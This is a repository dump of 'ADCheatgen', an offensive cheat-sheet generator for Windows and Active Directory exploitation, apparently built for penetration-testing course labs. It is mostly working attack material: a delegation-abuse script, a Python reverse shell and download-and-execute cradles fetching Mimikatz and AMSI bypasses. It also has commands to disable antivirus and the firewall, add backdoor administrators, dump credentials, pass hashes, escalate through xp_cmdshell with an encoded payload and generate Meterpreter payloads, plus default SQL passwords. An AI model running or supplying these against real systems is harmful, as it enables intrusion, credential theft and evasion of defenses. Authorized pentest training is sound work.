├── Auto_attack └── rbcd.ps1.txt ├── Macro └── cv.docm ├── README.md ├── SQLAUDIT ├── DAFT.exe └── DefaultCredentials.xml ├── bin ├── .DS_Store ├── ADCollector.exe ├── Advanced_Port_Scanner_2.5.3869.exe ├── PrintSpoofer.exe ├── PrintSpoofer1.exe ├── PsExec64.exe ├── Rubeus.exe ├── SharpHound.exe ├── SharpUp.exe ├── SpoolSample.exe ├── bypass-clm.exe ├── chisel.exe ├── chisel.exe.zip ├── nc64.exe └── winPEASx64_ofs.exe ├── compressedfile ├── .DS_Store ├── HeidiSQL_11.3_64_Portable.zip ├── Mimi_new.zip ├── SharpHound.zip ├── kekeo.zip ├── processhacker-2.39-bin (1).zip └── x64.zip ├── default_data ├── .DS_Store └── groups.zip ├── fileupload ├── .DS_Store └── 1.aspx ├── kali-generator ├── .DS_Store ├── cheat_gen.sh ├── commands.txt ├── todo.txt ├── xor.py └── xor_ps │ ├── xor-ps1-script.sh │ └── xor-template.ps1 ├── new ├── 1.doc ├── 1.hta ├── 1.xsl ├── payload.xml ├── payload.xsl └── payload_lab.xml ├── nmap ├── nmap-7.92-win32.zip └── npcap-1.60.exe ├── ps ├── .DS_Store ├── HostRecon.txt ├── Invoke-DCSync.txt ├── Invoke-Mimikatz.txt ├── Invoke-TokenManipulation.txt ├── LAPSToolkit.txt ├── PowerUp.txt ├── PowerUpSQL.txt ├── PowerUpy.txt ├── PowerView.txt ├── Powermad.txt ├── PrivescCheck.txt ├── SharpHound.txt ├── amsi-bypass.txt ├── amsi-bypass_k.ps1 ├── amsi-bypass_k.txt ├── nc.txt └── powerviewv1.txt ├── ps_obf └── .DS_Store ├── tools └── .DS_Store └── xml ├── .DS_Store ├── powershell-repl.csproj └── reverse_tcp.txt /Auto_attack/rbcd.ps1.txt: -------------------------------------------------------------------------------- 1 | # import the necessary toolsets 2 | Import-Module .\powermad.ps1 3 | Import-Module .\powerview.ps1 4 | 5 | # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account 6 | whoami 7 | 8 | # the target computer object we're taking over 9 | $TargetComputer = "primary.testlab.local" 10 | 11 | $AttackerSID = Get-DomainUser attacker -Properties objectsid | Select -Expand objectsid 12 | 13 | # verify the GenericWrite permissions on $TargetComputer 14 | $ACE = Get-DomainObjectACL $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID} 15 | $ACE 16 | 17 | ConvertFrom-SID $ACE.SecurityIdentifier 18 | 19 | # add a new machine account that we control 20 | New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) 21 | 22 | # get the SID of the new computer we've added 23 | $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid 24 | 25 | # build the new raw security descriptor with this computer account as the principal 26 | $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" 27 | 28 | # get the binary bytes for the SDDL 29 | $SDBytes = New-Object byte[] ($SD.BinaryLength) 30 | $SD.GetBinaryForm($SDBytes, 0) 31 | 32 | # set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity' 33 | Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 34 | 35 | # confirming the security descriptor add 36 | $RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity 37 | $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 38 | $Descriptor.DiscretionaryAcl 39 | 40 | # currently don't have access to primary\C$ 41 | dir \\primary.testlab.local\C$ 42 | 43 | # get the hashed forms of the plaintext 44 | .\Rubeus.exe hash /password:Summer2018! /user:attackersystem /domain:testlab.local 45 | 46 | # execute Rubeus' s4u process against $TargetComputer 47 | # EF266C6B963C0BB683941032008AD47F == 'Summer2018!' 48 | # impersonating "harmj0y" (a DA) to the cifs sname for the target computer (primary) 49 | .\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:harmj0y /msdsspn:cifs/primary.testlab.local /ptt 50 | 51 | 52 | # cleanup - clear msds-allowedtoactonbehalfofotheridentity 53 | Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity' 54 | 55 | -------------------------------------------------------------------------------- /Macro/cv.docm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/Macro/cv.docm -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ADCheatgen 2 | 3 | This is a tool which I created to generate most-used techniques and commands for Microsoft Windows and Active Directory (post-)exploitation. It contains all important commands to help durring the penetration testing of Active directory. 4 | 5 | ## Usage 6 | 7 | **To Clean** 8 | ``` 9 | ┌──(root💀kali)-[/mnt/hgfs/Shared_Folder/ADCheatgen/kali-generator] 10 | └─# ./cheat_gen.sh clean 11 | ``` 12 | 13 | **To Genearte** 14 | ``` 15 | ┌──(root💀kali)-[/mnt/hgfs/Shared_Folder/ADCheatgen/kali-generator] 16 | └─# ./cheat_gen.sh > comamnds.txt 17 | ``` 18 | 19 | **Output** 20 | 21 | ``` 22 | ################################################ 23 | Online Tools 24 | ################################################ 25 | https://exploit-me.com/ 26 | https://www.revshells.com/ 27 | https://raikia.com/tool-powershell-encoder/ 28 | https://www.jackson-t.ca/runtime-exec-payloads.html 29 | https://lolbas-project.github.io/ 30 | https://gtfobins.github.io/ 31 | https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a (Kerberos) 32 | 33 | # Color the text 34 | tput setaf 3;cat commands.txt 35 | ################################################ 36 | Client side attack 37 | ################################################ 38 | sendemail -f attacker@email.com -t vactim@email.com -u attacker -m attackerpass -s x.x.x.x:25 -vvv -a resume.doc 39 | 40 | ############### 41 | Fix the bugs 42 | ############## 43 | Invoke-Command -ComputerName dc02 -ScriptBlock {ipconfig} 44 | 45 | ################################################ 46 | Information Gathering 47 | ################################################ 48 | nmap -f -oG victim.com.nmap_quick victim.com 49 | nmap --open -Pn -p - -sV -sC -T4 -oA victim.com.nmap_full --open victim.com 50 | nmap -p0- -v -A -T4 -oA victim.com.nmap_full_aggresive 192.168.49.57 51 | 52 | # Proof 53 | hostname & type c:\Users\Administrator\Desktop\proof.txt & ipconfig 54 | # Windows 55 | echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 56 | 57 | # Linux 58 | echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " " 59 | 60 | ############################################### 61 | tty shell Update 62 | ############################################### 63 | python -c 'import pty; pty.spawn("/bin/bash")' 64 | Ctrl+z 65 | stty raw -echo; fg 66 | reset 67 | export SHELL=bash 68 | export TERM=xterm-256color 69 | 70 | ################################################ 71 | Initial Shell (nc_port:446, python_port:4242) 72 | ################################################ 73 | 74 | powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/nc.txt');" 75 | python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.49.57,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 76 | 77 | 78 | -------Meter_preter------------------ 79 | cmd.exe /c powershell wget http://192.168.49.57/Verified/new/payload.xml -O C:\ProgramData\payload.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\ProgramData\payload.xml 80 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/bad.ps1') | IEX 81 | 82 | ----------Start Powershell------------------ 83 | powershell.exe -nop -ep bypass 84 | 85 | ---Powershell_repal-------- 86 | curl -o powershell-repl.csproj http://192.168.49.57/Verified/xml/powershell-repl.csproj && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe powershell-repl.csproj 87 | 88 | 89 | 90 | ################################################ 91 | Bypass_AV_AMSI_Constrained_MODE_APPLOCKER 92 | ################################################ 93 | 94 | ----------Constrained_mode------------------ 95 | $ExecutionContext.SessionState.LanguageMode 96 | wget http://10.10.14.105/Verified/bin/bypass-clm.exe -o C:\ProgramData\bypass-clm.exe --> exe not present. 97 | 98 | ----------AMSI BYPASS-------------- 99 | powershell.exe -nop -ep bypass 100 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/amsi-bypass.txt') | IEX 101 | 102 | ----------Applocker Bypass----------- 103 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\ProgramData\bypass-clm.exe 104 | 105 | ---------Disable Antivirus------------ 106 | Set-Mppreference -disablerealtimemonitoring 1 107 | 108 | --------Disable Restricted_mode------ 109 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 110 | 111 | 112 | ############################################### 113 | Privielge Escalation 114 | ############################################### 115 | PrintSpoofer.exe -i -c cmd.exe 116 | 117 | 118 | 119 | ################################################ 120 | Weaponized tools. 121 | ################################################ 122 | 123 | curl -o ADCollector.exe http://192.168.49.57/Verified/bin/ADCollector.exe 124 | curl -o nmap.zip http://192.168.49.57/Verified/nmap/nmap-7.92-win32.zip 125 | curl -o Mimi_new.zip http://192.168.49.57/Verified/compressedfile/Mimi_new.zip 126 | curl -o npcap.exe http://192.168.49.57/Verified/nmap/npcap-1.60.exe 127 | curl -o PsExec64.exe http://192.168.49.57/Verified/bin/PsExec64.exe 128 | curl -o Rubeus.exe http://192.168.49.57/Verified/bin/Rubeus.exe 129 | curl -o chisel.exe http://192.168.49.57/Verified/bin/chisel.exe 130 | curl -o SharpUp.exe http://192.168.49.57/Verified/bin/SharpUp.exe 131 | curl -o SpoolSample.exe http://192.168.49.57/Verified/bin/SpoolSample.exe 132 | curl -o SharpHound.exe http://192.168.49.57/Verified/bin/SharpHound.exe 133 | curl -o DAFT.exe http://192.168.49.57/Verified/SQLAUDIT/DAFT.exe 134 | 135 | v#TODO 136 | curl -o SQLServerClient.exe http://192.168.49.57/Verified/bin/SQLServerClient.exe 137 | curl -o PrintSpooferNet.exe http://192.168.49.57/Verified/bin/PrintSpooferNet.exe 138 | curl -o katzimim.exe http://192.168.49.57/Verified/bin/katzimim.exe 139 | curl -o MiniDump.exe http://192.168.49.57/Verified/bin/MiniDump.exe 140 | curl -o HollowEvade.exe http://192.168.49.57/Verified/bin/HollowEvade.exe 141 | curl -o FilelessLateralMovement.exe http://192.168.49.57/Verified/bin/FilelessLateralMovement.exe 142 | 143 | 144 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/SharpHound.txt') | IEX; Invoke-BloodHound -CollectionMethod All 145 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/PowerUp.txt') | IEX; Invoke-AllChecks | Out-File -FilePath ~\powerup.txt 146 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/Invoke-Mimikatz.txt') | IEX 147 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/HostRecon.txt') | IEX 148 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/LAPSToolkit.txt') | IEX 149 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/PowerView.txt') | IEX 150 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/PowerUpSQL/PowerUpSQL.txt') | IEX 151 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/Powermad.txt') | IEX 152 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/powerviewv1.txt') | IEX 153 | 154 | $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://192.168.49.57/Verified/bin/winPEASx64_ofs.exe' -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main('log') 155 | 156 | $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://192.168.49.57/Verified/bin/Rubeus.exe' -UseBasicParsing | Select-Object -ExpandProperty Content)); [Rubeus.Program]::Main("dump".Split()) 157 | 158 | #TODO 159 | Invoke-ShareFinder 160 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/nice-function.txt') | IEX; Nice-Function -dd84f627e34042a19d0e69bbfb56125d $buf 161 | 162 | 163 | 164 | ################################################ 165 | Lateral_Moment_commands 166 | ################################################ 167 | psexec.py : 445 168 | dcomexec.py : 135,445,(49751 dcom) 169 | smbexec.py : 445 170 | wmiexec.py : 135,445,(50911 winmgmt) 171 | atexec.py : 445 172 | crackmapexec 173 | 174 | Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {type C:\Users\Administrator\Desktop\proof.txt} 175 | 176 | evil-winrm -i 192.168.57.121 -u 'infinity\ted' -p 'ksecurity' 177 | evil-winrm -i 192.168.57.121 -u 'infinity\ted' -H 'e929e69f7c290222be87968263a9282e' 178 | 179 | ###################### 180 | Enable RDP 181 | ###################### 182 | # Add User 183 | net user evilme evilme /add 184 | net localgroup "Administrators" evilme /add 185 | net group ""Enterprise Admins"" offsec /add /domain 186 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 187 | 188 | # Allow Remote Access 189 | netsh firewall set opmode disable 190 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 191 | 192 | 193 | 194 | %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe 195 | .\Rubeus.exe monitor /interval:1 /nowrap 196 | .\PsExec.exe -i -s -d powershell 197 | .\SpoolSample.exe dc02.dmzacbank.com appsrv09.dmzacbank.com 198 | 199 | 200 | mimikat# 201 | privilege::debug 202 | !processprotect /process:lsass.exe /remove 203 | sekurlsa::logonpasswords 204 | lsadump::dcsync /all /csv 205 | 206 | 207 | #kekeo 208 | tgt::delgate 209 | 210 | 211 | # Pass-The-Hash and or Restricted Admin login 212 | // if you want to connect to RDP using mimikatz 213 | sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" 214 | 215 | // if you want to connect to target machine using mimikatz powershell 216 | mimikatz.exe "sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe" 217 | 218 | // if you want to connect to target machine using xfreedesktop 219 | Enter-PSSession -Computer 220 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 221 | 222 | xfreerdp +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8 /u: /pth: /v: 223 | xfreerdp /d: /u: /pth:HASH /v:HOST /cert-ignore -dynamic-resolution /drive:Verified,/path/to/Verified /timeout:60000 224 | 225 | 226 | ################################################ 227 | Blood-Hound Queries 228 | ################################################ 229 | Return all computers. 230 | MATCH (u:Computer) return u.name 231 | 232 | Return all nodes with outgoing permision. 233 | MATCH (n)-[r]->(g) where r.isacl = true return distinct(n.name) 234 | 235 | 236 | 237 | #################################################################################### 238 | Attacking from Linux 239 | #################################################################################### 240 | 241 | ================ 242 | Turn of automatic date and time 243 | ================ 244 | timedatectl set-ntp 0 245 | ntpdate 192.168.57.5 246 | 247 | 248 | ############################# 249 | Crackmap 250 | ############################# 251 | # Generate a list of relayable hosts (SMB Signing disabled) 252 | crackmapexec smb --kdcHost 192.168.57.5 192.168.57.0/24 --gen-relay-list relay.txt 253 | 254 | # PSEXEC 255 | crackmapexec smb 192.168.57.121 -d infinity -u 'ted' -H ':e929e69f7c290222be87968263a9282e' -x 'whoami' 256 | 257 | # WINRM 258 | crackmapexec winrm 192.168.57.121 -d infinity -u 'ted' -H 'e929e69f7c290222be87968263a9282e' -x 'whoami' 259 | 260 | # Password_spray 261 | proxychains4 -q crackmapexec smb 172.16.57.0/24 -u 'Administrator' -d '.' -H '8388d07604009d14cbb78f7d37b9e887' 262 | 263 | ############################# 264 | pywerview 265 | ############################# 266 | 267 | # Hint: 268 | # use --hashes if you dont have passwowrd. ) 269 | # usefull: get-netdomaintrust, get-netgroupmember, get-netshare, get-netfileserver, get-netsubnet 270 | 271 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netdomain -u 'ted' -t 'dc03.infinity.com' -p 'ksecurity' 272 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netdomaintrust -u 'ted' -t 'dc03.infinity.com' -p 'ksecurity' 273 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'ksecurity' 274 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'ksecurity' --unconstrained 275 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'ksecurity' -spn '*' 276 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netgroup -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'ksecurity' | awk 'NF' > groupts.txt 277 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netgroupmember -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'ksecurity' --groupname PswReaders 278 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'ksecurity' 279 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'ksecurity' --unconstrained 280 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'bolabola.com' -t 'dc03.bolabola.com' -p 'ksecurity' --spn 281 | 282 | 283 | # Compare Groups with the default groups and find the difff 284 | PATH : /mnt/hgfs/Shared_Folder/Verified/default_data/groups.txt 285 | cat groupts.txt | anew /mnt/hgfs/Shared_Folder/Verified/default_data/groups.txt 286 | 287 | 288 | 289 | ########################## 290 | Convert Ticket to kerbi formate. 291 | ######################## 292 | # Hint: If TGT ticket is not working please try using kekeo to get ticket tgt::delgate (This solved the problem of null sessions) 293 | 294 | cat /tmp/krb5cc_742201114_vjlDum |base64 -w 0 295 | echo '======' | base64 -d > user.ccache 296 | ticketConverter.py user.ccache user.kirbi 297 | mimikataz# 298 | kerberos::ptt user.kirbi 299 | Enter-PSSession -ComputerName web01 300 | 301 | ---From windows to linux 302 | [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) 303 | 304 | 305 | ########################################## 306 | IMPACKET 307 | ########################################## 308 | # Hint: 309 | # replace -hashes with -k -no-pass (if kerberos) 310 | # IMPORTANT NOTE: DOMAIN NAME SHOULD NOT BE RETURN IN SINGLE QOUTE ELSE IT IS CASE SENSITIVE AND YOU WILL GET 311 | # USE /etc/resolve.conf #Because kerberos is bitch. 312 | 313 | # PSEXEC (Pass the Hash) 314 | impacket-psexec -hashes ":e929eds9f7c290222be87968263a9282d" "bolabola/ted"@192.168.57.121 315 | impacket-psexec -no-pass -k PROD.CORP1.COM/offsec@APPSRV01.PROD.CORP1.COM -dc-ip 192.168.57.70 316 | 317 | # WMIEXEC (Pass the Hash) 318 | impacket-wmiexec -hashes ":e929e69f7c290222be87968263a9282e" "bolabola/ted"@192.168.57.121 319 | 320 | # NTLMRELAYX (NTLMV2 RELAY) 321 | impacket-ntlmrelayx.py -smb2support -t 10.10.10.1 -c 'whoami /all' -debug 322 | 323 | # Convert Ticket to kerbi formate. 324 | python ticket_converter.py ticket.kirbi ticket.ccache 325 | kirbi2ccache ticket.kirbi wow.ccache 326 | export KRB5CCNAME= 327 | 328 | # DCSYNC 329 | impacket-secretsdump -just-dc 'bolabola/pete@192.168.57.120' -hashes ":00f50c4047ef95b6349492e3eb0a1b41" 330 | 331 | # Normal pc secrets dump 332 | impacket-secretsdump 'bolabola/pete@192.168.57.121' -hashes ":00f50c4047ef95b6349492e3eb0a1b41" 333 | 334 | # Get user emails 335 | impacket-GetADUsers -no-pass -k bolabola.com/offsec -dc-ip 192.168.57.5 336 | 337 | # Kerberoasting / relay Attacks 338 | impacket-GetUserSPNs -no-pass -k bolabola.com/offsec -dc-ip 192.168.57.5 -outputfile lab1/output_tgs 339 | 340 | 341 | # MSSQL CONNECT & SMB RELAY ATTACK 342 | impacket-mssqlclient -no-pass -k bolabola.com/offsec@appsrv01.bolabola.com 343 | impacket-mssqlclient -no-pass -k bolabola.com/offsec@dc01.bolabola.com 344 | 345 | 346 | ########################################### 347 | # MSSQL - Queries 348 | ########################################## 349 | # https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/MSSQL/Program.cs 350 | # use db "master" 351 | 352 | # Enumerate login info 353 | SELECT SYSTEM_USER; 354 | 355 | # Enumerate database username. 356 | SELECT USER_NAME(); 357 | 358 | # Enumerate if user is member of Public or Sysadmin. If role is one then true. 359 | SELECT IS_SRVROLEMEMBER('public'); 360 | SELECT IS_SRVROLEMEMBER('sysadmin'); 361 | 362 | # Force NTLM authentication for hash-grabbing or relaying 363 | EXEC master..xp_dirtree "\192.168.49.67\share" 364 | impacket-ntlmrelayx.py -smb2support -t 10.10.10.1 -c 'whoami /all' -debug 365 | 366 | # Get logins that we can impersonate 367 | SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; 368 | 369 | # Impersonate login and get login information 370 | EXECUTE AS LOGIN = 'sa'; 371 | use msdb; EXECUTE AS USER = 'dbo'; 372 | 373 | # Impersonate dbo in trusted database and execute through 'xp_cmdshell' 374 | use msdb; EXECUTE AS USER = 'dbo'; 375 | EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 376 | EXEC xp_cmdshell 'whoami'; 377 | 378 | # Impersonate dbo in trusted database and execute through 'sp_OACreate' 379 | use msdb; EXECUTE AS USER = 'dbo'; 380 | EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; 381 | DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'whoami'; 382 | 383 | ######## 384 | # Enumerate linked servers 385 | ######## 386 | EXEC sp_linkedservers; 387 | Linked SQL server: DC01 388 | 389 | 390 | ######### 391 | # Execute on linked server 392 | ######### 393 | EXECUTE AS LOGIN = 'sa'; 394 | EXEC sp_serveroption 'SQL03', 'rpc out', 'true'; 395 | EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT SQL03; 396 | EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT SQL03; 397 | EXEC ('xp_cmdshell ''whoami'';') AT SQL03; 398 | EXEC ('xp_cmdshell ''powershell.exe -exec bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADUANwAvAFYAZQByAGkAZgBpAGUAZAAvAHAAcwAvAG4AYwAuAHQAeAB0ACcAKQA7AA=='';') AT SQL03; 399 | 400 | ############ 401 | # Execute on linked server via 'openquery' 402 | ############ 403 | select version from openquery("dc01", 'select @@version as version') 404 | select 1 from openquery("dc01", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure') 405 | select 1 from openquery("dc01", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure') 406 | select 1 from openquery("dc01", 'select 1; exec xp_cmdshell '"powershell whoami"') 407 | select * from openquery("sql03",'exec master..xp_cmdshell "powershell whoami"') 408 | 409 | ############ 410 | # Escalate via double database linkedString 411 | ############## 412 | 413 | # Enabling advanced options on appsrv01 using AT 414 | EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT appsrv01') AT dc01 415 | 416 | # Find the login on DC01 417 | select mylogin from openquery("dc01", 'select SYSTEM_USER as mylogin'); 418 | 419 | # Finding the login on APPSRV01 after following the links 420 | select mylogin from openquery("dc01", 'select mylogin from openquery("appsrv01", ''select SYSTEM_USER as mylogin'')') 421 | 422 | select * from openquery("dc01", 'select * from openquery("appsrv01", ''select (SYSTEM_USER)'')') 423 | EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT appsrv01') AT dc01 424 | EXEC ('EXEC (''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT appsrv01') AT dc01 425 | EXEC ('EXEC (''xp_cmdshell ''''whoami /priv'''';'') AT appsrv01') AT dc01 426 | 427 | 428 | ############################## 429 | Powerup SQL 430 | ############################## 431 | # Find sql servers 432 | Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose 433 | 434 | # Audit the SQL instance 435 | Invoke-SQLAudit -Verbose -Instance SQLServer1 436 | 437 | # Privielge Esclate using powerupsql. 438 | Invoke-SQLEscalatePriv -Verbose -Instance SQLServer1 439 | 440 | # Get linked servers. 441 | Get-SQLServerLinkCrawl -Instance web06 442 | 443 | Executing Commands 444 | Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami' 445 | 446 | Get-SQLQuery -Verbose -Instance "web06.dev.final.com" -Query "EXEC sp_serveroption 'SQL03', 'rpc out', 'true';" 447 | Get-SQLQuery -Verbose -Instance "web06.dev.final.com" -Query "EXEC sp_serveroption 'SQL03', 'rpc', 'true';" 448 | 449 | 450 | 451 | 452 | ############################################## 453 | Cracking 454 | ############################################# 455 | 456 | # Cracking Net NTLMv2 HASH 457 | hashcat -m 5600 hash.txt dic.txt --force 458 | 459 | # Cracking Kerberoasting, getuserspn, tgs files 460 | hashcat -m 13100 --force 461 | john --format=krb5tgs --wordlist= 462 | 463 | # Cracking ssh private key password. 464 | /usr/share/john/ssh2john.py id_rsa.johny > sshhash.txt 465 | john sshhash.txt --wordlist=/usr/share/wordlists/rockyou.txt 466 | 467 | 468 | # Cracking Ansible 469 | ansible2john test.yml 470 | hashcat testhash.txt --force --hash-type=16900 471 | cat pw.txt | ansible-vault decrypt 472 | 473 | 474 | # Bcyrpt 475 | sudo john derbyhash.txt --wordlist=/usr/share/wordlists/rockyou.txt 476 | 477 | 478 | 479 | 480 | .........................................MSF CONSOLE................................................... 481 | 482 | 483 | Paylaod Generator: reverse_https:raw 484 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.57 LPORT=443 -f raw StagerVerifySSLCert=true handlersslcert=/mnt/hgfs/Shared_Folder/OSEP-CHEATGEN/kali-generator/msf_tmp/certificate_msfvenom.pem -o /mnt/hgfs/Shared_Folder/OSEP-CHEATGEN/kali-generator/msf_tmp/reverse_https.raw 485 | Paylaod Generator: reverse_tcp:raw 486 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.57 LPORT=443 -f raw -o /mnt/hgfs/Shared_Folder/OSEP-CHEATGEN/kali-generator/msf_tmp/reverse_tcp.raw 487 | ``` 488 | 489 | 490 | 491 | 492 | 493 | -------------------------------------------------------------------------------- /SQLAUDIT/DAFT.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/SQLAUDIT/DAFT.exe -------------------------------------------------------------------------------- /SQLAUDIT/DefaultCredentials.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | ej 5 | ej 6 | 7 | 8 | sa 9 | sage 10 | 11 | 12 | admin 13 | ca_admin 14 | 15 | 16 | ARIS9 17 | *ARIS!1dm9n# 18 | 19 | 20 | sa 21 | AutodeskVault@26200 22 | 23 | 24 | sa 25 | RPSsql12345 26 | 27 | 28 | sa 29 | AutoMateBPA9 30 | 31 | 32 | sa 33 | CDRDicom50! 34 | 35 | 36 | sa 37 | Cod3p@l 38 | 39 | 40 | sa 41 | Cod3p@l 42 | 43 | 44 | sa 45 | CounterPoint8 46 | 47 | 48 | ELNAdmin 49 | ELNAdmin 50 | 51 | 52 | sa 53 | CambridgeSoft_SA 54 | 55 | 56 | CADSQLAdminUser 57 | Cr41g1sth3M4n! 58 | 59 | 60 | sa 61 | DHLadmin@1 62 | 63 | 64 | admin 65 | ca_admin 66 | 67 | 68 | sa 69 | 70 | 71 | 72 | sa 73 | DHLadmin@1 74 | 75 | 76 | sa 77 | Webgility2011 78 | 79 | 80 | sa 81 | ecopy 82 | 83 | 84 | e+C0py2007_@x 85 | e+C0py2007_@x 86 | 87 | 88 | sa 89 | 42Emerson42Eme 90 | 91 | 92 | sa 93 | sa 94 | 95 | 96 | sa 97 | Hpdsdb000001 98 | 99 | 100 | sa 101 